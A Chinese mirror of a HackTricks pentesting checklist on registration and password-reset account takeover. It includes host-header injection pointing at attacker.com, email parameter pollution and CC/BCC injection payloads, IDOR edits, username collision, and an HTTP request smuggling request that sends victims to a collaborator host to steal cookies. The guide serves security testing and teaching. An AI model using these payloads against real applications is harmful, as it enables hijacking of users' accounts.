mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-26 22:52:06 +00:00
8.5 KiB
8.5 KiB
注册和接管漏洞
从零开始学习AWS黑客技术,成为专家 htARTE(HackTricks AWS红队专家)!
支持HackTricks的其他方式:
- 如果您想看到您的公司在HackTricks中做广告或下载PDF格式的HackTricks,请查看订阅计划!
- 获取官方PEASS和HackTricks周边产品
- 探索PEASS家族,我们的独家NFTs
- 加入 💬 Discord群 或 电报群 或在Twitter上关注我 🐦 @carlospolopm。
- 通过向HackTricks和HackTricks Cloud github仓库提交PR来分享您的黑客技巧。
注册接管
重复注册
- 尝试使用现有用户名生成
- 检查变化的电子邮件:
- 大写
- +1@
- 在电子邮件中添加一些点
- 电子邮件名称中的特殊字符(%00,%09,%20)
- 在电子邮件后面放置黑色字符:
test@test.com a
- victim@gmail.com@attacker.com
- victim@attacker.com@gmail.com
用户名枚举
检查是否可以确定应用程序中是否已经注册了用户名。
密码策略
创建用户时检查密码策略(检查是否可以使用弱密码)。
在这种情况下,您可以尝试暴力破解凭据。
SQL注入
查看此页面以了解如何尝试通过SQL注入在注册表单中接管账户或提取信息。
Oauth接管
{% content-ref url="oauth-to-account-takeover.md" %} oauth-to-account-takeover.md {% endcontent-ref %}
SAML漏洞
{% content-ref url="saml-attacks/" %} saml-attacks {% endcontent-ref %}
更改电子邮件
注册后尝试更改电子邮件,并检查此更改是否被正确验证或是否可以更改为任意电子邮件。
更多检查
- 检查是否可以使用一次性电子邮件
- 长 密码(>200)会导致拒绝服务(DoS)
- 检查账户创建的速率限制
- 使用username@burp_collab.net并分析回调
重置密码接管
通过引用者泄漏重置密码令牌
- 请求使用您的电子邮件地址重置密码
- 单击重置密码链接
- 不要更改密码
- 单击任何第三方网站(例如:Facebook,Twitter)
- 拦截Burp Suite代理中的请求
- 检查引用者标头是否泄漏重置密码令牌。
重置密码篡改
- 在Burp Suite中拦截重置密码请求
- 在Burp Suite中添加或编辑以下标头:
Host: attacker.com
,X-Forwarded-Host: attacker.com
- 使用修改后的标头转发请求
http POST https://example.com/reset.php HTTP/1.1 Accept: */* Content-Type: application/json Host: attacker.com
- 查找基于_host header_的密码重置URL,例如:
https://attacker.com/reset-password.php?token=TOKEN
通过电子邮件参数重置密码
# parameter pollution
email=victim@mail.com&email=hacker@mail.com
# array of emails
{"email":["victim@mail.com","hacker@mail.com"]}
# carbon copy
email=victim@mail.com%0A%0Dcc:hacker@mail.com
email=victim@mail.com%0A%0Dbcc:hacker@mail.com
# separator
email=victim@mail.com,hacker@mail.com
email=victim@mail.com%20hacker@mail.com
email=victim@mail.com|hacker@mail.com
API参数上的IDOR
- 攻击者必须使用他们的帐户登录并转到更改密码功能。
- 启动Burp Suite并拦截请求。
- 将其发送到重复选项卡并编辑参数:用户ID/电子邮件
powershell POST /api/changepass [...] ("form": {"email":"victim@email.com","password":"securepwd"})
弱密码重置令牌
密码重置令牌应该是随机生成的,并且每次都是唯一的。
尝试确定令牌是否过期或是否始终相同,在某些情况下,生成算法可能较弱且可被猜测。以下变量可能被算法使用。
- 时间戳
- 用户ID
- 用户电子邮件
- 名字和姓氏
- 出生日期
- 密码学
- 仅数字
- 小令牌序列(字符在[A-Z,a-z,0-9]之间)
- 令牌重用
- 令牌过期日期
泄露密码重置令牌
- 使用API/UI触发特定电子邮件的密码重置请求,例如:test@mail.com
- 检查服务器响应并查找
resetToken
- 然后在URL中使用令牌,如
https://example.com/v3/user/password/reset?resetToken=[THE_RESET_TOKEN]&email=[THE_MAIL]
通过用户名冲突进行密码重置
- 使用与受害者用户名相同但在用户名之前和/或之后插入空格的用户名在系统上注册,例如:
"admin "
- 使用您恶意的用户名请求重置密码。
- 使用发送到您电子邮件的令牌重置受害者密码。
- 使用新密码连接到受害者帐户。
平台CTFd易受此攻击影响。
参见:CVE-2020-7245
通过跨站脚本攻击实现账户接管
- 在应用程序内或子域中找到XSS,如果cookie范围限定为父域:
*.domain.com
- 泄露当前的会话cookie
- 使用cookie对用户进行身份验证
通过HTTP请求走私实现账户接管
- 使用smuggler检测HTTP请求走私的类型(CL、TE、CL.TE)
powershell git clone https://github.com/defparam/smuggler.git cd smuggler python3 smuggler.py -h
\ - 构造一个请求,将
POST / HTTP/1.1
覆盖为以下数据:
GET http://something.burpcollaborator.net HTTP/1.1 X:
,目的是将受害者重定向到burpcollab并窃取其cookie\ - 最终请求可能如下所示
GET / HTTP/1.1
Transfer-Encoding: chunked
Host: something.com
User-Agent: Smuggler/v1.0
Content-Length: 83
0
GET http://something.burpcollaborator.net HTTP/1.1
X: X
通过CSRF实现账户接管
- 创建CSRF的有效载荷,例如:“自动提交密码更改的HTML表单”
- 发送有效载荷
通过JWT实现账户接管
JSON Web Token可能用于验证用户身份。
- 编辑JWT以更改用户ID/电子邮件
- 检查弱JWT签名
{% content-ref url="hacking-jwt-json-web-tokens.md" %} hacking-jwt-json-web-tokens.md {% endcontent-ref %}
参考资料
从零开始学习AWS黑客技术,成为专家 htARTE(HackTricks AWS Red Team Expert)!
支持HackTricks的其他方式:
- 如果您想在HackTricks中看到您的公司广告或下载PDF格式的HackTricks,请查看订阅计划!
- 获取官方PEASS & HackTricks周边产品
- 探索PEASS家族,我们的独家NFTs收藏品
- 加入 💬 Discord群 或 电报群 或 关注我的 Twitter 🐦 @carlospolopm。
- 通过向HackTricks和HackTricks Cloud github仓库提交PR来分享您的黑客技巧。